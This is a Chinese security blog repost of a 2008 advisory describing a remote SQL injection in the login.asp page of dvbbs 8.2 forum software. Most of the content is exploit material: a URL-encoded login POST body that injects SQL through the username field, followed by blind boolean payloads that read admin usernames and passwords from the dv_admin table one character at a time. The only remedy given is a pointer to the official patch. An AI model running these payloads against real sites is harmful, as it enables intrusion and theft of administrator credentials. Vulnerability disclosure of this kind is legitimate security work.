dvbbs8.2(access/sql)版 login.asp远程注入漏洞exploit

2008-5-31 15:45:18  分类:漏洞信息  作者:xloong 已被围观loading 被网友评论0条 我要评论

来源:seclists

email:
hackerb_at_hotmail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection  -  (dvbbs8.2 access/sql版 login.asp文件远程SQL注入漏洞)

danger level(危险级别):
critical/High(危险/高)

info:
dvbbs is prone to multiple sql injection security flaw

interrelated code to access version(exploit):
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

Examples(access version):
decide
Where and 1=1
where and 1=2
to get usernamer or password
where’ and 1=(select count(*) from dv_admin where left(username,1)=’a') and ‘1′=’1
where’ and 1=(select count(*) from dv_admin where left(username,2)=’ad’) and ‘1′=’1
…………………..
…………………..
where’ and 1=(select count(*) from dv_admin where left(password,1)=’1′) and ‘1′=’1
where’ and 1=(select count(*) from dv_admin where left(password,2)=’15′) and ‘1′=’1
………………….
………………….

Solution(解决办法):
Authorities patch(官方补丁)
dvbbs web site(http://www.dvbbs.net)

References(参考):
dvbbs(http://www.dvbbs.net)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/dvbbs8.2-access-sql-version-login.asp-remote-sql-injection.html

Tags: dvbbs   数据库   注入   漏洞信息   exploit  

| More

已有0位网友对本文做了一针见血的评论 【我要评论

评论:



< # TEMPLATE_INCLUDE_POSTAD # >
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅RSS

搜 索

最新发表

最新评论

最新留言

其 他